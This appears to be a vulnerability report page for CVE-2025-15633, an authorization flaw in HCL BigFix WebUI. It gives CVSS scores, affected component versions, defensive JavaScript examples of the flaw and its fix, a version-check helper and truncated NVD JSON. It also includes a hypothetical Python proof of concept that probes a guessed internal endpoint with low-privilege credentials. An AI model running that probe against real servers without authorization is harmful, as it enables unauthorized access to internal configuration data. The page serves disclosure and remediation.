Security Vulnerability Report
CVE-2025-15633 CVSS 6.5 MEDIUM

CVE-2025-15633

Published: 2026-05-09 06:16:07
Last Modified: 2026-05-14 20:28:21

Description

An improper authorization vulnerability in HCL BigFix WebUI allows an authenticated user without Master Operator privileges to access internal data (site names, versions, and configuration variables) and bypass privilege requirements via unprotected endpoints lacking adequate security headers.
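
The flaw class described above (CWE-863: an endpoint that verifies a session exists but never verifies which privileges it carries) is easiest to see side by side with its fix. The following is an added illustration, not HCL BigFix code: the route paths, the session/role model, the "internal" payload and the response headers are all assumptions made for the example, and which headers HCL actually added in the fix is not stated on this page. The differential check at the end is the one a reviewer would run against every internal route: call it as an authenticated non-Master Operator and flag anything that still returns data.

```javascript
// Added example (not HCL BigFix code): the authorization flaw described for
// CVE-2025-15633, reduced to a framework-free request handler so it runs offline.
// Roles, paths, headers and the "internal" payload are assumptions for illustration.

const INTERNAL_DATA = {
  sites: [{ name: "Example Site", version: "1.2.3" }],   // constructed sample
  config: { exampleVariable: "production" },             // constructed sample
};

// Hypothetical WebUI session model: every logged-in user has a session;
// only some sessions carry the Master Operator role.
function sessionFor(req) {
  return req.session && req.session.user ? req.session : null;
}

// Vulnerable pattern (CWE-863): the endpoint checks that *a* session exists
// (authentication) but never checks *which* privileges it carries
// (authorization), so any authenticated operator reads internal data.
function vulnerableInternalConfig(req) {
  const session = sessionFor(req);
  if (!session) return { status: 401, headers: {}, body: { error: "login required" } };
  return { status: 200, headers: {}, body: INTERNAL_DATA };
}

// Hardened pattern: a reusable guard that enforces the privilege requirement
// server-side, plus the cache/framing headers an internal JSON endpoint should
// carry (assumed defaults for sensitive JSON, not HCL's actual header set).
const SENSITIVE_JSON_HEADERS = {
  "Cache-Control": "no-store",
  "Content-Type": "application/json; charset=utf-8",
  "X-Content-Type-Options": "nosniff",
  "X-Frame-Options": "DENY",
};

function requireMasterOperator(handler) {
  return (req) => {
    const session = sessionFor(req);
    if (!session) return { status: 401, headers: SENSITIVE_JSON_HEADERS, body: { error: "login required" } };
    if (!session.isMasterOperator) {
      // Deny by default and do not explain which role would have been needed.
      return { status: 403, headers: SENSITIVE_JSON_HEADERS, body: { error: "forbidden" } };
    }
    return handler(req, session);
  };
}

const hardenedInternalConfig = requireMasterOperator(
  () => ({ status: 200, headers: SENSITIVE_JSON_HEADERS, body: INTERNAL_DATA })
);

// Route table: the regression check below walks it, so a new internal route
// registered without the guard fails the check instead of silently shipping.
const ROUTES = {
  "/api/internal/config": hardenedInternalConfig,
  "/api/internal/sites": requireMasterOperator(
    () => ({ status: 200, headers: SENSITIVE_JSON_HEADERS, body: INTERNAL_DATA.sites })
  ),
};

// Differential check: probe every internal route as an authenticated
// non-Master Operator and report any that still returns data.
function findUnprotectedRoutes(routes, prefix = "/api/internal/") {
  const lowPriv = { session: { user: "testuser", isMasterOperator: false } };
  return Object.entries(routes)
    .filter(([path]) => path.startsWith(prefix))
    .filter(([, handler]) => handler(lowPriv).status === 200)
    .map(([path]) => path);
}

const LOW = { session: { user: "testuser", isMasterOperator: false } };
const MASTER = { session: { user: "admin", isMasterOperator: true } };
console.log("vulnerable handler, low-priv:", vulnerableInternalConfig(LOW).status);  // 200
console.log("hardened handler, low-priv:", hardenedInternalConfig(LOW).status);      // 403
console.log("hardened handler, master:", hardenedInternalConfig(MASTER).status);     // 200
console.log("unprotected internal routes:", findUnprotectedRoutes(ROUTES));          // []
console.log("with the vulnerable route registered:",
  findUnprotectedRoutes({ ...ROUTES, "/api/internal/legacy": vulnerableInternalConfig })); // ["/api/internal/legacy"]
```

The point of `findUnprotectedRoutes` is that it tests behaviour, not code: it would have caught the vulnerable handler regardless of how the authorization check was (not) written, which is what you want in a regression suite for an authorization fix.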

CVSS Details

CVSS 3.1 (primary metric)
Score: 6.5 MEDIUM
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Exploitability sub-score 2.8, impact sub-score 3.6

CVSS 4.0 (secondary metric)
Score: 5.3 MEDIUM
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N

Weakness: CWE-863 (Incorrect Authorization)

The two vectors agree on the preconditions (network-reachable, low complexity, any authenticated low-privilege account, no user interaction) but disagree on confidentiality impact: the 3.1 vector rates it C:H, the 4.0 vector VC:L with a low impact on subsequent systems. Either way the leaked site names, component versions and configuration variables are reconnaissance data that narrows follow-on attacks against the deployment, so do not deprioritise the fix on the lower score alone.

Configurations (Affected Products)

Component (NVD CPE) - vulnerable range (versionEndExcluding from the NVD configuration data)
cpe:2.3:a:hcltech:bigfix_webui_api:*:*:*:*:*:*:*:* - VULNERABLE, versions before 33
cpe:2.3:a:hcltech:bigfix_webui_application_administration:*:*:*:*:*:*:*:* - VULNERABLE, versions before 40
cpe:2.3:a:hcltech:bigfix_webui_cmep:*:*:*:*:*:*:*:* - VULNERABLE, versions before 22
cpe:2.3:a:hcltech:bigfix_webui_common:*:*:*:*:*:*:*:* - VULNERABLE, versions before 101
cpe:2.3:a:hcltech:bigfix_webui_content_app:*:*:*:*:*:*:*:* - VULNERABLE, versions before 28
cpe:2.3:a:hcltech:bigfix_webui_custom:*:*:*:*:*:*:*:* - VULNERABLE, versions before 50
cpe:2.3:a:hcltech:bigfix_webui_data_sync:*:*:*:*:*:*:*:* - VULNERABLE, versions before 37
cpe:2.3:a:hcltech:bigfix_webui_extensions:*:*:*:*:*:*:*:* - VULNERABLE, versions before 14
cpe:2.3:a:hcltech:bigfix_webui_framework:*:*:*:*:*:*:*:* - VULNERABLE, versions before 35
cpe:2.3:a:hcltech:bigfix_webui_insights:*:*:*:*:*:*:*:* - VULNERABLE, versions before 32
cpe:2.3:a:hcltech:bigfix_webui_ivr:*:*:*:*:*:*:*:* - VULNERABLE, versions before 23
cpe:2.3:a:hcltech:bigfix_webui_mdm:*:*:*:*:*:*:*:* - VULNERABLE, versions before 29
The NVD configuration data lists further WebUI components, but the raw JSON reproduced at the end of this page is truncated, so the list above is not complete.
HCL BigFix WebUI (refer to HCL's official advisory KB0130587 to confirm the affected and fixed versions).
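
Because the fix is spread across many independently versioned WebUI components, the practical question is "which of my installed components fall below their bound". The following is an added helper, not part of this page or of HCL's tooling: the thresholds are copied from the versionEndExcluding values in the NVD configuration data above, the installed-version inventory is a constructed sample, and because the page's JSON is truncated, any component not in the table is reported as uncovered rather than assumed safe.

```javascript
// Added example: compare an inventory of installed BigFix WebUI component
// versions against the NVD "versionEndExcluding" bounds for CVE-2025-15633.
// Bounds below are copied from this page's configuration data; the JSON on the
// page is truncated, so components missing here are reported as "uncovered".

const FIXED_IN = {
  bigfix_webui_api: 33,
  bigfix_webui_application_administration: 40,
  bigfix_webui_cmep: 22,
  bigfix_webui_common: 101,
  bigfix_webui_content_app: 28,
  bigfix_webui_custom: 50,
  bigfix_webui_data_sync: 37,
  bigfix_webui_extensions: 14,
  bigfix_webui_framework: 35,
  bigfix_webui_insights: 32,
  bigfix_webui_ivr: 23,
  bigfix_webui_mdm: 29,
};

// The bounds on this page are plain integers, so comparing the leading integer
// of the installed version is exact ("28.9" < 29, "29.1" >= 29). Accept
// "32", "32.0" or " 32 "; anything else is flagged rather than guessed.
function parseVersion(v) {
  const m = String(v).trim().match(/^(\d+)(?:\.\d+)*$/);
  return m ? Number(m[1]) : NaN;
}

function assessInventory(inventory) {
  const result = { vulnerable: [], fixed: [], uncovered: [], unparsable: [] };
  for (const [component, installed] of Object.entries(inventory)) {
    const bound = FIXED_IN[component];
    if (bound === undefined) { result.uncovered.push(component); continue; }
    const major = parseVersion(installed);
    if (Number.isNaN(major)) { result.unparsable.push(component); continue; }
    // versionEndExcluding: every version strictly below the bound is vulnerable.
    (major < bound ? result.vulnerable : result.fixed).push(`${component}@${installed}`);
  }
  return result;
}

// Constructed sample inventory (not a real deployment). "bigfix_webui_other"
// stands in for a component that the truncated page data does not cover.
const SAMPLE_INVENTORY = {
  bigfix_webui_api: "32",
  bigfix_webui_common: "101",
  bigfix_webui_mdm: "28.1",
  bigfix_webui_other: "45",
  bigfix_webui_insights: "n/a",
};

console.log(JSON.stringify(assessInventory(SAMPLE_INVENTORY), null, 2));
```

Treat "uncovered" as "check the vendor advisory", not as "safe": the component list on this page stops mid-entry, and HCL's KB0130587 is the authority for the full set.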

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import sys

import requests
import urllib3

# This PoC is hypothetical: the endpoint path below is inferred from the
# advisory description, not taken from HCL's disclosure. Adjust it, and the
# login flow, to the deployment under test.

# Target configuration
target_host = "https://bigfix-server.example.com"
login_url = f"{target_host}/api/login"
# Hypothetical vulnerable endpoint based on the description
vuln_url = f"{target_host}/api/internal/config"

# Low-privileged credentials (an account without Master Operator rights)
username = "testuser"
password = "testpass"

# verify=False is used below for lab hosts with self-signed certificates;
# silence the resulting InsecureRequestWarning so it does not clutter output.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

session = requests.Session()

# 1. Authenticate to obtain a session
# Note: adapt the authentication method to the actual deployment
auth_payload = {"username": username, "password": password}
try:
    login_resp = session.post(login_url, data=auth_payload, verify=False, timeout=15)
except requests.RequestException as e:
    print(f"Connection error: {e}")
    sys.exit(1)
if login_resp.status_code != 200:
    print(f"Login failed (HTTP {login_resp.status_code})")
    sys.exit(1)

# 2. Probe the authorization bypass
# The vulnerability allows access to internal data without Master Operator rights
headers = {
    "User-Agent": "CVE-2025-15633-Scanner",
    "Accept": "application/json",
}
print(f"Attempting to access internal data: {vuln_url}")
response = session.get(vuln_url, headers=headers, verify=False, timeout=15)

# A bare 200 is not proof: single-page apps often answer any path with the
# HTML shell and HTTP 200. Require a JSON body before calling it a bypass, and
# confirm by diffing against the same request made as a Master Operator.
content_type = response.headers.get("Content-Type", "")
if response.status_code == 200 and "json" in content_type.lower():
    print("[+] Internal data returned to a non-Master Operator session:")
    print(response.text)
elif response.status_code == 200:
    print(f"[?] HTTP 200 but Content-Type is {content_type!r}; inspect manually")
else:
    print(f"[-] Failed. Status Code: {response.status_code}")

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15633", "sourceIdentifier": "[email protected]", "published": "2026-05-09T06:16:07.413", "lastModified": "2026-05-14T20:28:21.457", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An improper authorization vulnerability in HCL BigFix WebUI allows an authenticated user without Master Operator privileges to access internal data (site names, versions, and configuration variables) and bypass privilege requirements via unprotected endpoints lacking adequate security headers."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": 
"NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_api:*:*:*:*:*:*:*:*", "versionEndExcluding": "33", "matchCriteriaId": "8680650F-B404-4812-AD8D-F93A7F52C20B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_application_administration:*:*:*:*:*:*:*:*", "versionEndExcluding": "40", "matchCriteriaId": "D8757E08-9B05-45FD-BEAC-7D27423C7FC4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_cmep:*:*:*:*:*:*:*:*", "versionEndExcluding": "22", "matchCriteriaId": "DD60E500-25B7-42B4-8B0E-D84967B78AF4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_common:*:*:*:*:*:*:*:*", "versionEndExcluding": "101", "matchCriteriaId": "E6441EA2-8CF7-4A3B-8AD8-BBE2A62E5DF4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_content_app:*:*:*:*:*:*:*:*", "versionEndExcluding": "28", "matchCriteriaId": "CFE1EED8-C5C9-47CD-B20E-E5D113B4DF48"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_custom:*:*:*:*:*:*:*:*", "versionEndExcluding": "50", "matchCriteriaId": "92437F31-8DD7-4440-AF6A-02B5DDA55A3F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_data_sync:*:*:*:*:*:*:*:*", "versionEndExcluding": "37", 
"matchCriteriaId": "9F3C0E3C-1CE1-43FC-9B4C-8D0EE77E3E10"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_extensions:*:*:*:*:*:*:*:*", "versionEndExcluding": "14", "matchCriteriaId": "0F22F7CB-24CC-445F-87D9-CB0B4346401E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_framework:*:*:*:*:*:*:*:*", "versionEndExcluding": "35", "matchCriteriaId": "B7C2A16C-A840-47FF-9272-A17BD4CD7499"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_insights:*:*:*:*:*:*:*:*", "versionEndExcluding": "32", "matchCriteriaId": "97643BD1-2CE5-43A4-86C9-C25EE643E977"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_ivr:*:*:*:*:*:*:*:*", "versionEndExcluding": "23", "matchCriteriaId": "58DA2A15-7F8A-4D04-A158-18CBB803BF8C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_mdm:*:*:*:*:*:*:*:*", "versionEndExcluding": "29", "matchCriteriaId": "A1287A97-8E7A-4B5F-BE14-2D871BD2E886"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_pa ... (truncated)